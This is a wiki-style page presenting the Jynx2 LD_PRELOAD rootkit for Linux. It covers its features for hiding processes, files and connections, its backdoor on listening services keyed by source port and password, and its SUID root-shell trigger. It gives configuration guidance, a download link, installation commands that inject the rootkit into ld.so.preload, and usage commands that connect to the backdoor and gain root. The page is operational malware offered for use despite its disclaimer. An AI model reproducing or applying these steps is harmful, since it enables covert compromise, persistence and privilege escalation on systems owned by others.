Jynx Rootkit/2.0
Jynx2 is an expansion of the original Jynx LD_Preload rootkit written in C with several modifications for multi-factor authentication, a more compatible shell drop, and additional hiding features. |
_ _,.-.' .-. _ .' |,' ."".| |.""._ ( || ,',"". `._`' ` ' `. `\ | `" .-"`-..` . `. | `..--.._ | \ _,| _...'_.' ,+. `. ,""'| `...-'..""(__.._ -" `"--.. `. |`._,' ,' /\ .'""` .'""`. `. | `. \ ' / / / || || |.`.`. . | \ `.__,'-._' /|` -"' `-.' \ \ \ `"-' \ ' `. / /_| | |'""| | .-""'`'"`-,.-"\ . . / .\ . / | | `._.' || ,' \ \ ' / / |/ /_.-+._`-..--"-. . . \ ` / /.' ' ,'""'-. `"."'""'`.. |. \ \ / . | j . . | |\__," |. ` ' \ . | | | | ' | '| | ' ` \ \ . | | | `.____,' ..____,' | | . \ | | | | ._ _..---._ _,' | . ' | | | | | "" . |`"' \ `.| ' ' ' . | | | | | | | ` ` . . \ | | | | | | ' | \ `. | | . | ' ' | | | . ` \ \ | | | | \ ` | | | . `. | | | | \ \ ' | ` ' ` `+..|___|___|_........ \ \ \| ' . `. `. | `. \ . . ` `. `-. .' _,'`. \' . \ `-.._ `._ ,' _." `._ `.` | . `._ . `._ _,`"--`. | . `. | `-._ ,' | `. `|_ ,' | | `. `. .' __...__.| | \ __..._ _,..,.__ `. `-`"' `._..--'-.__ .' `-..' ``'"--..-' `"---' /$$$$$ /$$ /$$ /$$ /$$ |__ $$ | $$ /$$/|__/ | $$ | $$ /$$ /$$ /$$$$$$$ /$$ /$$ | $$ /$$/ /$$ /$$$$$$ | $$| $$ | $$| $$__ $$| $$ /$$//$$$$$$| $$$$$/ | $$|_ $$_/ /$$ | $$| $$ | $$| $$ \ $$ \ $$$$/|______/| $$ $$ | $$ | $$ | $$ | $$| $$ | $$| $$ | $$ >$$ $$ | $$\ $$ | $$ | $$ /$$ | $$$$$$/| $$$$$$$| $$ | $$ /$$/\ $$ | $$ \ $$| $$ | $$$$/ \______/ \____ $$|__/ |__/|__/ \__/ |__/ \__/|__/ \___/ /$$ | $$ | $$$$$$/ \______/
It is a crime to use techniques or tools on this page against any system without written authorization unless the system in question belongs to you |
Special thanks to ErrorProne and xo for their contributions to this article.
Contents
Features
- Hiding from netstat
- Hiding from ps/top and /proc
- File hiding
- SSL connect accept() hook
- Multi-factor authentication
- Improved anti-removal features
- SUID Drop-shell with environment variable
Archive Contents
[root@ares jynx2]# ls Makefile README config.h jynx2.c packer.sh reality.c
In this rendition of jynx, two shared libraries are built by the installation process. One, jynx2.so functions as the actual rootkit, while the other, reality.so, functions as a method for the remote access user to be able to see their own files and processes. |
Configuration Options in Config.h
Improper configuration of Jynx2 can result in severe system instability, including segmentation faults of nearly every process on the infected host. |
MAGIC_STRING
- MAGIC_STRING is the name of the directory that jynx installs to from the top level directory /. By default, this directory is hidden from the root user via the magic UID and GID. If the MAGIC_STRING is set to "hiddendir", jynx2 will install to (and hide) the folder "/hiddendir".
this can be used as a prefix to any files or processes that the user wishes to hide; it is not limited exclusively to Jynx2's installation directory. |
MAGIC_GID and MAGIC_UID
- Similar to the original Jynx Rootkit, Jynx2 will automatically hide processes, files, and connections owned by the magic UID or GID.
REALITY_PATH
- This is the path where reality.so will be copied to. By default, Jynx2 will install this into /XxJynx/reality.so. Notice: It is recommended to set REALITY_PATH to /$MAGIC_STRING/reality.so in order to keep this file hidden from the root user.
CONFIG_FILE
The CONFIG_FILE defaults to ld.so.preload, which is commonly located in the /etc directory. Alternatively, services can be backdoored by setting the LD_PRELOAD environment variable if overwriting /etc/ld.so.preload is unfavorable. |
MULTI-FACTOR AUTHENTICATION
With Jynx2, the MAGIC_ACK/MAGIC_SEQ port-knocking authentication method was deprecated in favor of HIGH_PORT, LOW_PORT, and an accept() hook. This means that Jynx2 can backdoor any existing listening service without interrupting normal user interactivity for that service. |
The first are HIGH_PORT and LOW_PORT, which default to 41, and 43 respectively. The source port of a client connection must fall between this port range in order to activate Jynx2's accept() hook. Because this port is typically reserved for inbound connections, it is rare that any connection will randomly have this origin port. The second factor in Jynx2 authentication is SHELL_PASSWORD. This should be the first line sent to the backdoor upon connecting, defaulting to "DEFAULT_PASS", it should be changed before compilation.
LIBC_PATH
LIBC_PATH is set in config.h and defines the path to the libc binary, which can be obtained by using ldd against any common coreutil or binutil. In order to locate this, simply run ldd $(which ls) or something similar.
ENV_VARIABLE
A new feature in Jynx2 is the ability to drop a local suid shell using an environment variable as defined in the configuration. When this environment variable is set, SUID executables will grant root access to the local machine for privilege escalation by the remote user.
Download & Installation
It is highly recommended that configuration be changed before compiling or installing Jynx2 to any device. |
- Download URL: http://blackhatacademy.net/releases/jynx2.tgz
Installation
# tar xzf jynx2.tgz # Unpack tarball # nano -w config.h # Set configuration # make all # Compile jynx2.so # make install # Installs jynx2, injects into ld preload, and sets correct GIDs
Usage
Once Jynx2 is successfully installed on a target machine, accessing it's accept() hook with the default configuration looks like:
[user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl DEFAULT_PASS Bump with shell. >ls -lia 214473 drwxr-xr-x 2 user users 176 Mar 7 19:19 . 177137 drwxr-xr-x 15 user users 952 Mar 5 22:15 ..
By default, with XxJynx as the ENV_VARIABLE configuration:
>XxJynx=1 gpasswd / >id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)
Further Reading
- C
- Jynx version 1.0
- LD_Preload
- Jynx2 Sneak peek, Analysis and Removal Instructions (Infosec Institute)
|
Jynx2 Visit the Linux Portal for complete coverage.
|